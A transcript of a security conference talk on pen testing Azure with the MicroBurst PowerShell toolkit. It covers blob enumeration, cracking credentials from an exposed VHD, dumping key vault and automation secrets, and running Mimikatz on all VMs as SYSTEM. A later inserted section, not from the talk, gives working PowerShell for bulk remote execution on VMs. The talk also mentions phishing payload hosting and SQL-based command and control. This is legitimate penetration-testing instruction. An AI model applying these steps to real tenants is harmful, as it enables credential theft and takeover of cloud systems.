
Thanks everybody. Can everybody hear me at this distance? I don't know how close I need to get to the mic here. All right, so I think that intro kind of covered most of it here, but a little bit about me: I'm Karl Fosaaen, practice director at NetSPI. I do pen testing. In the past I've done lots of password cracking, social engineering, blogging, a bit of a cloud enthusiast, and since we are in Oregon, I'm a homebrewer, like to brew beer. I was actually here for HomebrewCon like six months ago, don't know if anybody else was, but another fun conference that happens to be here. Thank you for being here on a Saturday afternoon with the competition of the other conferences going on here. I know Pokemon and anime might be a little bit more exciting, but we'll try and make this interesting.

So my info is up here: NetSPI's GitHub, you can find a lot of the stuff I've written up at blog.netspi.com, you can find me on Twitter at @kfosaaen, and I'm the old guy yelling at the cloud.

So this is our outline. We're gonna talk about all this stuff, so I'm not gonna stay on this slide, but we're gonna start with talking about dumping Azure data first. So why would we want to dump data from Azure? So we have a number of clients who are moving over to Azure because of a lot of reasons, but primarily, wow, everything is pumping ahead here. So primarily a lot of our clients are starting to move over to Azure environments due to the fact that Azure Active Directory is easy to integrate with existing Active Directory environments, so things like role based access control or billing, now all of these things can be tied to Active Directory users and groups. That's really easy to migrate to cloud infrastructure that's already tied to your Active Directory infrastructure. As attackers this is great for us because things like season-and-year password combinations, we can go ahead and guess a user's password for a domain. During, I don't know why this keeps jumping ahead, my timings are all messed up on here. Anyways, what I'm saying is as an attacker from an external perspective we can go ahead and guess a password and get access to Active Directory through the Microsoft portal or through Azure. So frequently when we get those credentials during an external pen test we like to go ahead and dump information from the Azure configuration to further our attacks. So typically normal domain users have access to the Azure portal. Most times that we run into Active Directory creds on an external pen test, those users have rights to log in. It's pretty rare that it's actually locked down to a point that regular users do not have access to the Azure portal, so we want to get access to all that information. Additionally, doing Azure infrastructure audits, we do have clients that bring us in to look at their actual Azure infrastructure and do an audit against, you know, best practices, make sure that everything is actually correctly managed and set up properly, all of that.

So why can we do this? Well, the user management is available over the Internet. It's the cloud, it's meant to be available publicly. Frequently this is done without multi-factor authentication. Typically for a standard Windows domain they're not gonna set up multi-factor authentication for the Azure portal if they're not locking down portal access in the first place, so we're finding lots of single factor authentication points with the Azure portal and it's easy to get access this way.

So why do we want to automate this? Well, talking about all of the things that we want to gather, doing this by hand and going through the portal website can be a little bit time-consuming with all the copying and pasting. We want to automate this with PowerShell, which is what we did with the MicroBurst tools. So MicroBurst is a GitHub repo that we've got the link for right up here. I'll have links for all this stuff at the end and I'll have the slides later. I don't know why I keep jumping ahead to the next slide, I apologize for that. Anyways, the repository's got a handful of PowerShell scripts that we use to do Azure assessments. So here's some of the current functions. We're going to talk about these during the actual demo here, so we're not gonna linger on these, but it does have a couple of module dependencies that it will prompt for when you import the actual MicroBurst module. So you can find code out here, but we'll have more links for that later.

So a quick note on permissions. So Azure has three really important permission levels: owner, contributor and reader. So within an Azure environment, this is gonna keep doing this because there's something weird with my timings, within each Azure environment you've got the environment, a subscription within that environment, and then that subscription has different services underneath that. Within that subscription you've got these three different levels of permissions. So the owner owns that subscription and they have rights to delegate rights out to other users, start up services, basically do everything. Contributors have rights to fire up virtual machines, use different services, but they're not allowed to assign specific rights to other users; that's what the owner accounts are for. The reader roles have rights to read configurations, read information, but in general not necessarily fire up virtual machines or anything like that. There are additional roles that you can create to allow a regular reader user to create virtual machines or deploy code or anything like that.
Those aren't hugely important here. We'll actually dump out the list of all of the roles with one of the tools within MicroBurst, but they're worth looking into because sometimes there's some interesting kind of inheritance issues where you may end up getting owner type access to something when you didn't intend to have that with some of these custom roles. But not hugely important here, but worth noting.

So there's a number of different ways to dump data from Azure. There's the Azure portal, REST APIs, PowerShell cmdlets, and it might jump ahead, yeah, there we go, I don't know why it keeps doing this, but anyways we'll talk about the Azure portal first. Kind of mentioned this first: we log in through the web interface, that's portal.azure.com, and if it's tied to your Active Directory or back to a federated Active Directory domain it's pretty easy to access with standard Windows domain credentials. But pros: it's a nice graphical interface, we can see kind of the sidebar here over on the right-hand side of the screen, it's nice to look at, but it's really hard to dump configuration information that way. So in terms of scaling, it's not easy to scale pulling information from there. The REST APIs that are available are nice structured JSON data, it's easy to make requests, easy to get data back, but setting up authentication for it, getting the actual tokens to access it, and some of the JSON data formatting is not ideal in terms of doing a lot of this at scale. So with the PowerShell cmdlets we've got integrated auth with the Active Directory Authentication Libraries, so you just put in usernames and passwords, get a token, really easy to operate with that. All of the data is typically returned as pipelineable objects, so for those people in the room that are not familiar with PowerShell, you have objects that you can basically export from one function to another and basically pipeline all of that data from one function to another. So let's say we want to get a list of all of the network interfaces for all of the virtual machines. Well, we could just ask Azure for a list of all of the virtual machines, pipe that virtual machine list into get interface, and basically pull out a list for each virtual machine, each of their interfaces. So we can pipeline all of this and streamline everything, which is really good for scalability. If you've got, you know, 400 virtual machines that you need to pull, you know, IP addresses for, it's really easy to do that. It's nice for data output as well; those same objects are easy to export to CSV files or text files. The only real con is PowerShell is a little bit limited in terms of threading options. It's kind of hard to spin up a bunch of different threads and it's hard to kind of multitask with PowerShell. It's not ideal, but the objects definitely make up for that.

So hopefully this doesn't jump ahead here. All right, we'll just plan for that on every slide. No, it's something with the template. I was trying to add some of these transitions earlier today so that things would pop up one at a time and I must have enabled something that automatically skips. So anyways, there are three different primary PowerShell cmdlets that you're gonna be using. The first two, the Azure Service Management and AzureRM, are kind of the primary ones that MicroBurst uses. Those are more of the older style. The Azure Service Management is kind of the original PowerShell cmdlets that you use to manage Azure infrastructure. AzureRM is the newer option for resource management; most of the functions that we're using in MicroBurst are around AzureRM modules. Az is the latest option that's actually going to replace the AzureRM modules. They just announced that about a week ago. Luckily for me, pretty much everything is going to be backwards compatible with AzureRM cmdlets, so I'm not gonna have to rewrite everything in about 6 months, so that's nice. The last one that we included on here is MSOnline, so this is for Microsoft Online Services, or Office 365 basically. If you're in a situation where you've got domain creds and you want to dump information about a domain and you don't have access to any of these Azure cmdlets or access to the Azure portal, chances are you're gonna have access to Office 365, where you can then still pull information about the domain: domain users, groups, lots of other stuff. It's pretty handy, but I'm including that on here because some of the MicroBurst stuff makes use of the MSOnline cmdlets.

So there is some existing tooling and research out here already. There's a tool called Azucar. I actually just talked with the author of that tool a couple of weeks ago about their tool. It doesn't quite meet the use cases for how I typically test Azure environments, but it is a good tool, has great reporting. There's Azurite Explorer. I haven't really used this a whole lot; a couple of the cmdlets in there are old cmdlets that are not compatible with the current version of AzureRM, so I never really use that. But if the MicroBurst tools do not work for you, I'd say go check out those; they may be more, you know, focused on the things that you're specifically looking to test. So I would say that this book that I have right up here, if anybody wants to look after the talk, is kind of required reading if you're going to be doing any Azure pen testing. So it's Pentesting Azure Applications by Matt Burrough. You can find that on No Starch. This came out right before DEF CON I think, and it really clearly outlines a good testing process for testing Azure applications and Azure environments. It's gonna drive me crazy, sorry, I can probably fix this in about two seconds.
Where's it, I don't remember, it was online. So just disabled the one thing that I enabled earlier, so we'll see if that works. Anyways, this is a great book if you're going to be pen testing Azure a lot. Then, wow, that is really annoying, sorry. All right, so if you're gonna be doing lots of Azure applications or Azure environments, I definitely recommend reading this, and jumping ahead to the next slide.

So let's talk about Azure services here. So there are a number of different Azure services that are out there. There are way too many to talk about today, we have relatively limited time here, but this is a rough count of the ones that we're going to talk about. Primarily we're gonna be looking at authenticated services that we can identify and unauthenticated services we can identify. So as an attacker I want things that I can potentially attack unauthenticated, enumerate different services without authentication, without those Active Directory domain credentials, and once we are authenticated I want to be able to list out all of the different important services that are enabled and stuff that we might be able to use for lateral movement, pivoting, anything like that. So this is kind of a rough overview of some of the ones we're gonna talk about.

But first things first, we'll talk about Azure Active Directory, or Azure AD, and the primary things that we care about here are users and groups. Really Azure Active Directory is just like regular Active Directory. In most environments that we're dealing with, people are doing something called DirSync, or Active Directory sync, up to Azure AD to basically sync up all of their Active Directory users and groups to Azure so that you can, you know, make use of those existing Active Directory users and groups. So within that we want to dump out tons of information to start attacking other users in the environment. So additional recon info, including things like phone numbers: so let's say we compromised that external environment, when I start doing phone based social engineering to get my way into internal systems. Likewise with phishing, we can pull out email addresses from Active Directory, start phishing attacks that way. Taking a look at enrolled devices, this one's really fun because lots of Azure Active Directory environments are now allowing kind of asset management options within your Active Directory, so you can, you know, track an asset to a specific person. So I can look up a specific domain administrator and know what the host name of their system is, so once we pivot to the internal network we know exactly where that domain admin's computer is going to be, already have the host name, pretty convenient. Third-party apps, this is the last line down here as well, accessing third-party apps. For practical examples, one of the things that we can pull out of Azure Active Directory is the list of integrated SSO endpoints, so things like AWS or WebEx or any HR expensing software that you may have that single sign-on, so where basically you go out to the website to put in your HR or expense information, that's going to be tied back to your Active Directory or ADFS, and we can list out all of the integrations there. So if you're on a red team assessment and need to get access to the HR payroll data, you know exactly where that URL is to access that. So that's really handy; it's a good way of showing impact or potential impact. The one thing I haven't covered on here is guest users. Azure Active Directory has a really interesting feature where you can add external domain users to your Active Directory domain, so I could go ahead and add my @netspi.com email address to another Azure Active Directory domain as a guest user. You can also apply these same types of users and groups policies to give myself, say, owner rights to the subscription and keep persistent access, because if they're not looking at the specific guest users, well, there's potential, there's persistence there and somebody could persist access. So those are pretty handy.

So storage accounts. We're gonna give this two seconds to let it bump ahead and then jump back, but storage accounts are really the way of storing data within Azure. There's a number of different data types that are supported within these storage accounts, but you can think of it this way: storage accounts start with the name, then the type of data type, and then core.windows.net. So in this case we've got a storage account named netspiazure, the service is any number of these names here, so let's say the blob service, this would be netspiazure.blob.core.windows.net. Blob is kind of the unstructured data; you can think of it like S3 buckets for Azure. You can basically just put whatever data you want in there and there's containers. You can apply policies to the different folders to give people access. I'll actually talk about that access policy in the next screenshot here, but this can also be easily misconfigured. So when you're setting up permissions for things, administrators need to give access to things to people, so, you know, I go for the things that work. So container access is anonymous access for everybody, read access, everything; you can list out files and access any of the files there in the container with the container permission. So we frequently find that with containers that are just set up and publicly available. So if we step back one step here, what we would do is look up a storage account, trying DNS brute force for one of these storage accounts, look at the blobs and enumerate folders from there. So let's say it's netspiazure.blob.core.windows.net. After that we would start guessing folder names. Here we've got a script that we reference on the blog post down here that you can do anonymous blob enumeration with. So what we do with that is a DNS brute force on that storage account and then try and look for specific containers after that. So we find very common names for folders or containers: test, dev, email, all sorts of just very common names, and you can basically throw, you know, a directory attack and grab your favorite list of directories and throw that in for potential folders for the containers. If any of those have public access enabled or container access enabled we'll then go ahead and just list out all of the publicly available files. This is kind of where we're at with the open S3 buckets from, what, three, four years ago, where lots of public data was just spilling everywhere. We're seeing lots of similar problems with Azure blob security. If you're able to find a blob storage container that's fully open, chances are all the different files, and see everything that's there. So it's surprisingly common. We find config files, VHD files, which we'll talk about in the example, but there are virtual hard drive files, you can mount those in Hyper-V and we'll show a full walkthrough, an example here. It's kind of fun. But found some PII, password data. You can also use these for hosting payloads, so that's my blob.core.windows.net, the end of that is windows.net, and you can access that over HTTPS. That SSL certificate is signed by Microsoft, so this all looks pretty legitimate if you send somebody out to a windows.net web site to download and run an executable or whatever file you want. So we've actually had pretty good luck with phishing engagements where the link is out to blob storage because we can make that publicly available and host payloads out there. And if anybody's worried about like, oh, but if I keep my payload out there, you know, Microsoft will capture it, I've had copies of like Mimikatz and other like reverse tools sitting in a storage container for a year now, so I haven't gotten an email or any notification, hey, you might have malware up in your blobs. So it's worked out pretty well.

So another service that we're commonly seeing used is Azure SQL. So it's Microsoft SQL up in the cloud. Azure SQL is really handy for, you know, just having your database out in the cloud if you're gonna host everything out there. However, you know, we see cases where people just open up the firewall rules to the actual database and it's just wide open to the Internet. It's actually kind of hard to do; you have to set your IP address range that's allowed to a pretty wide range to allow it. But we've seen it, typically in development environments where you've got, you know, a team that's separated across, you know, different time zones or different IP spaces or might be working from different coffee shops, that kind of thing. But we've seen it where it's, you know, pretty widely open on the firewall rules and you can access that directly with SQL Management Studio. You basically just point it at the Azure SQL database and you can go ahead and try and log in. We've seen it set up with, you know, common dev environment problems of weak sa passwords or just weak credentials in general. We've also made use of it as a command and control platform, so you could just go ahead and use Azure SQL database tables and some PowerShell to basically send command and control, because again we're going out to a trusted Windows domain and we're just making Microsoft SQL traffic that's going out over the Internet. But if you're a major shop there's a chance that you might actually be using Azure SQL for legitimate uses. So my co-worker Scott Sutherland, who put together a PowerShell toolkit called PowerUpSQL for attacking Microsoft SQL databases using PowerShell tools, he put together a really great blog post about using SQL as a C2 platform, so you can check that out on the NetSPI blog. You can also access this directly from the Microsoft Azure portal. There's a couple of different spots where you can pull credentials, which we'll talk about later on, but if you pull those connection strings and get access to the Azure SQL database you actually just use the direct SQL query functionality within the Microsoft portal and just query the database directly from the website. So it's also pretty handy. Oh, I mentioned that from an operational security standpoint, so if you don't want to open up firewall rules to your IP address to connect with SQL Management Studio you can just go through the website and then you don't have to open up any firewall rules or anything like that. You can just log in with the creds you have, so that's convenient.

So in terms of passwords, there's a number of different places that passwords hide out in Azure, the primary one being key vaults. So key vaults are, you know, what the name implies, a vault for keys. We find keys, certificates, passwords, all sorts of interesting stuff being stored in key vaults. Typically access on that is pretty restricted. You may have to grant yourself access with any accounts that you have in order to actually pull out data from that, but if you do have an account that does have access to the key vaults this can be really convenient for getting, you know, password data or certificate data, anything that might be handy for pivoting in the environment. Additionally, app service configurations, what I was talking about with the database connection strings. App Services is basically Azure's dynamic application management platform, so if you want to deploy your web code out to a web server in Azure you just point it at the repository for the code and say, hey, run the web server, run this code. It's really simple. You configure it with these app service configurations, which include things like deployment credentials, so where you upload the code to over either HTTP or FTP. You can pull those deployment credentials out of what's called the publishing profile within Azure and you can go ahead and put your own web shell up there or run your own code on the web server or do lots of other interesting things. So I've written the Get-AzurePasswords module within MicroBurst here that will go out to the key vaults, pull that information down, app service configs, do the same thing, and also do something with automation accounts. So automation accounts are Azure's way of automating different tasks within the Azure environment and you can configure these with specific credentials. You can also get access to these credentials relatively easily: you create a PowerShell script, upload it to a runbook within Azure, and the script is right here. We can see that we're just gonna get the username for the credential, the password for the credential, and just write them out. Really simple, like this is super simple, but we're basically gonna upload that PowerShell script up to a runbook in the environment, run it, get the credentials, and delete the automation script after the fact. So what we can see here is there's this kind of random, I think it's 12 character, string right here for the .ps1 runbook. What the Get-AzurePasswords script does is it writes that script that we just saw to a randomly named .ps1 file, uploads it, runs it, and deletes it, and then all that you see in the logs up in Azure is just this random string here, and you maybe think, well, maybe Microsoft ran something in the background, or this just seems like randomly named garbage. It's kind of hard to tell what this is. You can't pull down the PowerShell runbook after the fact; it's gone, it's already run and it's pretty much done at that point. So it's not the most OPSEC safe, but it can be really handy if you need to get access to those automation creds.
All right, so let's see if it bounces ahead here. All right, there we go. So just a quick note on MicroBurst: it is a PowerShell toolkit, it's lots of different PowerShell files. To import all of those, make use of them, you can use the Import-Module command and point it at the .psm1 file and that will load up all of the available commands that we have within MicroBurst. So a couple of different command examples; we'll go through those in the demo here, but I would just recommend with most of them using the verbose flag. I like using Write-Verbose because then you can kind of see what's going on, otherwise it's not outputting a whole lot of the data there. But with all of these I think we'll have examples, so we'll just go through those.

So getting into our demo here, just making sure we're good on time here. All right, so this is gonna be a sample escalation from anonymous access. Basically you don't see anything, we're starting with no credentials, we're gonna find an anonymously available blob, download that file, and then kind of pivot from there. You're gonna see all of this; this is more so if anybody wants to see the slides later, go through these. The videos aren't gonna be up on SlideShare, so this is kind of the rundown of that. So autoplay here, it probably won't because I got rid of the timings, there we go. All right, so what we're doing here is using the Invoke, all right, Invoke-EnumerateAzureBlobs with the base of microburst. So it found a storage account called microburst.blob.core.windows.net and it's gonna find a test container within there, and within that container we've got a public VHD file. So VHDs, or virtual hard disks, this is basically the file format that Microsoft uses for these virtual hard drives that you run virtual machines in Azure with. These are great, they're very portable, you can store them in different storage accounts, different areas, you can create them as kind of gold images. This is frequently what we see with these VHD files: somebody's created a gold image that they want to build all of their Azure virtual machines off of, then they make it publicly available within a container, and then we download it and get access to it. If you want to play around with this yourself, I would recommend using the smalldisk, all one word, smalldisk images for Windows, because those are only, I think those are 32 gigs compared to the standard hundred and twenty gig Azure virtual machines. It's a lot easier to download 32 gigs from a VHD file than it is 120, so if you're gonna play around with these and do this yourself I would recommend using those. I will also say all of this is done in videos. I initially recorded these for DerbyCon a few weeks ago. I've burned this entire environment down to the ground because I figured, well, if I'm instructing people on how to attack my Azure sample domain up here, I probably need to get rid of that after I make all this stuff public. So yeah, I think that covers that.

So let's see if we can bypass that jump there. So what we're gonna do here is paste the URL that we just saw in the last script there. I'm not gonna make you wait and watch 32 gigs download here, so we're gonna fast forward in time and there's our test VHD file. So if you right-click and mount within Windows, it's really convenient because you can just mount the VHD file. What we'll see here is, hey, it's a standard Windows hard drive, open up the Windows folder, cool. So from there we want to get the local admin credentials, so we're gonna use Cain and Abel to pull up the SYSTEM and SAM files. If anybody's familiar with this, they've probably done this a few times, but basically we're gonna grab the local cred store off of that Windows hard drive along with the boot key for it to decrypt it and pull back the local administrator credentials. So in this case we're gonna get the NTLM hash for, it'll show up in a second, the AZ administrator account. We see the NT hash on the right there. So there's a couple of different things we can do at this point. We'd go ahead and crack it, throw it in Hashcat, we crack that one, it's AZ-adminpass with an exclamation mark. Okay, I'm kind of making it easy on myself because I created that password, but anyways, if, you know, that's the situation, we're able to crack that, we could just go ahead and load up that virtual hard disk in Hyper-V and log in ourselves. So we can see here with a nice little whoami down here, we're logged in as that user, loaded this up in the Hyper-V manager, and now we've got full access to that virtual hard drive. Cool. There's lots of other things that you can do with full access to that. You could just browse the files, look at things. What's nice about this is once you've got full local admin access you can start, you know, using any applications that are on there, so if it's a virtual machine that's used to run a client application or something like that, you might be able to do the same things that you'd be able to do up in the cloud down on your local desktop. So it's convenient, but we kind of want to pivot up into the Azure environment at that point.

So let's say that we knew a little bit more about the environment. We knew the endpoint that the VM was pulled from; if we have the IP address for it or hostname we could potentially find that out on the Internet and RDP to it. There's a surprising number of Azure virtual machines with management ports wide open to the Internet. It's one of the default options that you can select when you create the virtual machine, just say, yeah, I want RDP open to the world. It warns you, says, hey, you're, you know, setting up RDP open to the world, you may not want to do this, but it's something that's pretty easy to set up. So let's say RDP is open. We'll just go ahead and log in, ran Mimikatz, hey, we got access to a domain user for the fosaaen domain. Previously we just had local admin rights; now we're getting into the actual domain here. So in this case ktest is domain admin. Like I said, I'm kind of stacking the deck here because this is my demo and it's easier to demo this stuff. This is based off of real-world experience; we've actually had experience, it's like this, where this has worked. But let's say that RDP is not open everywhere. Well, we can go ahead and grab the SAM, SECURITY and SYSTEM files and use the Impacket secretsdump to go ahead and get the cached credentials. So we can see here that ktest account on the fosaaen.com domain, we've got cached credentials here. So this happened when that domain admin logged into the box and that was cached on the Windows system. So we pulled that cached credential out and we go ahead and try and crack that. So in this case I created this user as a domain admin in Azure Active Directory. If you drop off all of the exclamation marks, that's the password that Microsoft created for that user by default. By default in Azure Active Directory, if you let Microsoft manage that domain it will create an eight character password right off the bat. It's upper/lower alphanumeric for the first four and then just numbers for the last four, so like Carl1234 might be an actual password there. This is the password they gave me; I put a couple exclamation marks on it, I needed to reset it a couple of times. But in this case we're able to get the cached credential, crack that, now we've got domain credentials that we can then go log back into the Azure portal or log in through PowerShell and start dumping information.

So with domain credentials we'll go ahead and Connect-AzureRmAccount. This is just more of the manual process of adding that account locally. If you're running any of the MicroBurst tools it will prompt you if you're not already authenticated, but for proof of concept here we want to show you that process. This is the ADAL login process here, just put in the ktest@fosaaen.com and the password we have. Hey, we're logged in to my first demo, cool. So what we're gonna do here is dump the domain info. So we're gonna select our subscription here and start dumping out all of these services and information. So this specific script here is going to go through the subscription and dump out all of the users, all of the groups, all of the services that are available, basically general configuration information, so you can get all of the information about what your attack surface area is. I kind of left some of the password stuff out of here and kept that in Get-AzurePasswords because I wanted to separate the two in case you wanted to use this for more audit focused compared to pen test focused. If you're doing more of an audit of your environment you probably don't want to dump all your passwords into the config data that you're also dumping here. So I will say that this does run a little bit slow on larger environments. If you're looking at 10,000 users in an Active Directory domain this could take quite a while to enumerate all of the users and groups, because it'll go through every one of the groups and get each of the users for each group. So there are flags on here to disable that. Here we're showing the output here, so it's gonna output to text files and CSV files for easy parsing and easy data management, but I will say if you're dealing with a very large environment I would recommend just disabling the users and groups because that might take quite a while. So the next thing that we're gonna do here is Get-AzurePasswords. So we can see here that we're logged in as ktest and running the Get-AzurePasswords function within here. With this one I definitely recommend outputting to grid view, so you'll see the grid view output at the end of this, but grid view's that nice Out-GridView, but it's a nice way of visualizing some of the data and it makes it easy for sorting and copying things out. So we can see here it's grabbing the list of key vaults, the Azure app services, and running our randomly named .ps1 file here, and here's the Out-GridView. So like I said, this is really handy, and like I also said, I've burned down this entire environment, so these passwords aren't gonna work now, so it's okay if you guys see these. But what we can see here is, you know, there's a number of different credentials here: the automation account, we've got some app service configs, a secret up at the top
with super-secret value so there's lots of good information that you can actually pull out of these but like I said key vaults are usually a little bit more locked down so your mileage may vary there all right so last item that we're gonna cover here in the demos is code execution now this is relatively new I'm gonna actually push the code for this within the next week or so here I'm just making some kind of last-minute tweaks to the and for the blogpost it's gonna go with this but this is a way to execute commands on all your virtual machines which might be kind of handy you can also limit it to individual subscriptions or individual resource
groups or just a list of your virtual machines that you want to provide but sure is nice enough to include an invoke as your RM VM run command so it's a bit of a mouthful here but basically you can point the URM VM run command at a specific virtual machine and say hey run this PowerShell script and it will do that it does require contributor rights so somebody that has a little bit more access than a regular reader user however what we've been finding is development people will typically have contributor rights in the issuer environment because they need to spend up virtual machines they need to deploy code they typically have a little bit more access so if you get access to a
developer account chances are you're gonna have contributor rights so the really nice thing about this is all of the commands actually execute as NT Authority system this is really bad like this is the most privileged you can get on a virtual machine and as you're here you're running a system you're running as the operating system it's great for us because if you know we want to run me me cats against all of the virtual machines it's pretty easy for us to do that because we're already system so in the demo we're gonna show we're gonna show actually running me me cats here but so some practical uses here running me me cats against all the virtual
machines together all of these available clear text financials or ntlm hashes pulling those off of those boxes potentially tasking see two agents so if you want to get say an empire meterpreter shell on all of the virtual machines in the insurer virtual machine environment you can go ahead and just do that you basically just task it up and say run this PowerShell command and hit go searching for data it's kind of nice you could search for sensitive files on stuff not so practical uses and you have bot nets or crypto miners or deleting everything off the virtual machines don't do those things those are bad that's my disclaimer for all of us just be careful don't do bad things this also
your success may depend on the VM region or the virtual machine configuration I've had some different regions that don't respond all that well to actually tasking up these commands I've currently the thing that's kind of delaying the blog posts I'm going through each of the different as your virtual machine regions that you can deploy to to try and get kind of timestamps on how long some of these commands run a standard you know us West virtual machine running it from my internet connection at home maybe takes thirty Seconds to a minute to execute the Mimi cat's PowerShell script but what you have to think about is we're actually uploading the entirety of that Mimi cat's powershell script to
that virtual machine running it and then pulling the info back down so it does take a little while to travel over the internet if you're going you know down to Australia or something that's got a bit of a round-trip to make to get back to the US so that could take upwards of a minute or more to actually execute conveniently for our demo I'm able to speed up time and video so it doesn't take that long so do here and what you can see on the screen right now is will run the invoke at your MVM bulk CMD with the Mimi test ps1 script and we'll jump right past our video using the script tag here we can
see the IP addresses for that virtual machine this is kind of handy for just keeping tabs on where that's actually running and we can see the Mimi cats output came back and it'll get to our password here a Hello besides PDX so what's really nice about this is you know if you're using that verbose and you're tasking say empire agents to phone home you can then correlate these specific external IP addresses they're coming back or internal ones to the verbose logs here and kind of figure out which systems actually executed your command-and-control all of that so that's the end of the demo here talking about fixes and kind of conclusions here in general try to limit your as your
access for non admin users there are options to do that and get that set up we do see it occasionally in some environments one thing I didn't know in here is that we've actually had web applications of allowed for Active Directory portal access so we've logged in with an application services application that uses Azure ad for authentication or handling authentication for users and we're actually able to use those credentials to log into the azure portal so something to keep in mind as you're developing applications and as your if you're using Azure Active Directory make sure you're walking down access for that one that's gonna be really hard here is try to get users to stop using fall 2018
is password or season year combinations I don't mean to call out or shame anybody here that is using that but that is the first thing we're gonna guess on a pen test season your combination is one of the most common that we run into outside of like company name one or password one things like that it typically meets complexity requirements we've got eight characters up or lower and a number here that's gonna get us access set up multi-factor authentication for access this is actually really easy to do I did this on my demo environment in like three minutes so it's really simple to set up conclusions wise powerpoints a major pain the cloud is complicated
misconfigurations will happen I learned a lot about configuring cloud services while putting this together I mess stuff up myself sometimes intentionally sometimes not intentionally but there are options for mitigate for mitigating the risks we've got the microburst tool set that you can use to you know check your environment there's other tool sets out there as well I know that some of the automated vulnerability scanners out there now do some configuration reviews I know tenable has got some profiles you can use for that as well so there are some options out there any questions
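As an added example (not part of the talk, and not MicroBurst's own Invoke-AzureRmVMBulkCMD code), here is a minimal PowerShell version of the bulk run-command idea described in the code execution demo above. With Contributor rights it enumerates the running Windows VMs in a subscription, optionally scoped to one resource group or an explicit VM list, pushes a script to each through Invoke-AzureRmVMRunCommand, and collects each VM's stdout and stderr into one object per VM. Instead of Mimikatz, the pushed script only reports whoami, hostname and local IPv4 addresses, which is enough to confirm the NT AUTHORITY\SYSTEM context and to keep the IP-to-VM mapping that the demo used the verbose output for. The subscription ID, the output paths and the function name are placeholders of mine.

```powershell
# Added example, not from the talk or from MicroBurst. Requires the AzureRM
# module (Az equivalents: Connect-AzAccount, Get-AzVM, Invoke-AzVMRunCommand)
# and a principal with Contributor rights on the target VMs.
# The subscription ID and file paths below are placeholders.

function Invoke-BulkRunCommand {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string]   $SubscriptionId,
        [string]   $ResourceGroupName,   # optional scope: one resource group
        [string[]] $VMName,              # optional scope: explicit VM names
        [Parameter(Mandatory)] [string]   $ScriptPath
    )

    Select-AzureRmSubscription -SubscriptionId $SubscriptionId | Out-Null

    # -Status adds PowerState so deallocated/stopped VMs, which RunCommand
    # cannot reach, are skipped. RunPowerShellScript only applies to Windows;
    # Linux VMs would need the RunShellScript command ID instead.
    $vms = if ($ResourceGroupName) {
        Get-AzureRmVM -ResourceGroupName $ResourceGroupName -Status
    } else {
        Get-AzureRmVM -Status
    }
    $targets = $vms | Where-Object {
        $_.PowerState -eq 'VM running' -and
        $_.StorageProfile.OsDisk.OsType -eq 'Windows' -and
        (-not $VMName -or $VMName -contains $_.Name)
    }

    foreach ($vm in $targets) {
        Write-Verbose ("Tasking {0} ({1}) in {2}" -f $vm.Name, $vm.ResourceGroupName, $vm.Location)
        try {
            # Synchronous: the script is uploaded, run as NT AUTHORITY\SYSTEM by
            # the VM agent, and stdout/stderr come back. Round-trip time varies
            # by region, as the talk notes, so expect slow calls for distant VMs.
            $result = Invoke-AzureRmVMRunCommand -ResourceGroupName $vm.ResourceGroupName `
                -VMName $vm.Name -CommandId 'RunPowerShellScript' -ScriptPath $ScriptPath

            $stdout = ($result.Value | Where-Object { $_.Code -like '*StdOut*' }).Message
            $stderr = ($result.Value | Where-Object { $_.Code -like '*StdErr*' }).Message
        } catch {
            # A failed call (throttling, agent not ready, no rights on this VM)
            # is recorded instead of aborting the whole sweep.
            $stdout = $null
            $stderr = $_.Exception.Message
        }

        [pscustomobject]@{
            VMName        = $vm.Name
            ResourceGroup = $vm.ResourceGroupName
            Region        = $vm.Location
            StdOut        = $stdout
            StdErr        = $stderr
        }
    }
}

# Script pushed to each VM: prints the execution context (expect
# NT AUTHORITY\SYSTEM), the hostname and the local IPv4 addresses, so each
# result can be matched to a host later.
$payload = @'
whoami
hostname
Get-NetIPAddress -AddressFamily IPv4 |
    Where-Object { $_.IPAddress -ne '127.0.0.1' } |
    ForEach-Object { $_.IPAddress }
'@
$scriptPath = Join-Path $env:TEMP 'recon.ps1'
Set-Content -Path $scriptPath -Value $payload

Connect-AzureRmAccount | Out-Null   # prompts for the compromised credentials
Invoke-BulkRunCommand -SubscriptionId '00000000-0000-0000-0000-000000000000' `
    -ScriptPath $scriptPath -Verbose |
    Export-Csv -Path (Join-Path $env:TEMP 'bulk-runcommand.csv') -NoTypeInformation
```

Two practitioner notes. First, only Contributor (or a custom role holding Microsoft.Compute/virtualMachines/runCommand/action) can do this; a Reader account will fail at the Invoke call, which is the "little bit more access" the talk refers to. Second, every invocation is written to the subscription Activity Log as a run command operation on the VM, which is the native hook for the alerting the speaker says is coming in the blog post: if Contributors can run SYSTEM-level code on your VMs, that operation is the one to audit.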
Audience question: Would it be more expedient to spin up a storage container in the same region [inaudible] and then make those copies directly, in region, to something that you own, you possess?

You could potentially do that. So the question was: when you're doing a pen test and you've got some additional resources to spin up, potentially, would it make more sense to use a more localized resource to copy over something like VHD files or really large files? I haven't tried that personally; it probably saves a lot of time. I've been looking at different options. I'm actually working with somebody online who's working on some other stuff kind of similar to that, but in terms of trying to parse those files, fully downloading a 120 GB image takes a long time. Yeah. Other questions?

Yep. So the question was: not only looking for out-of-policy items, but actually enforcing those out-of-policy items. I don't have anything in here at the moment to do any of that. We're trying to make this read-only kind of testing. There's some stuff that does make some changes, but we try to avoid major state changes in general, just as a rule of thumb. But in terms of a tool that could automate that, that would be pretty handy for people to use, or at least prompt them before they make the changes. Any other questions?

That's a good question. The question was: how noisy is MicroBurst, and how likely would a blue team detect this? So the nice thing from an attacker's or red teamer's perspective is we're using native technologies with the Azure cmdlets, so it's kind of expected behavior to a certain degree. There are some indicators for the invoke run command; I have that in the blog post that's coming up here. You can set up specific alerts for specific items, particularly around the command execution. If you're allowing people with Contributor rights to run system-level code on your virtual machines, you should definitely be auditing that, and I'll have specific instructions in the blog post about that.

Perfect. So the note from the crowd here was that there should be very specific logging for the key vaults, and I've looked into that. Yeah, I haven't done as much on the logging and blue team side of things; I've mostly just been trying to write tools to attack, but eventually we'll switch over to more of those. Any other questions? All right, cool. Well, thanks everybody for coming out for a Saturday afternoon talk. Like I said, I know there's competition with the anime and Pokémon here, but thanks to my NetSPI coworkers who did a lot of the QA on this and helped with testing, and anybody watching online, thank you.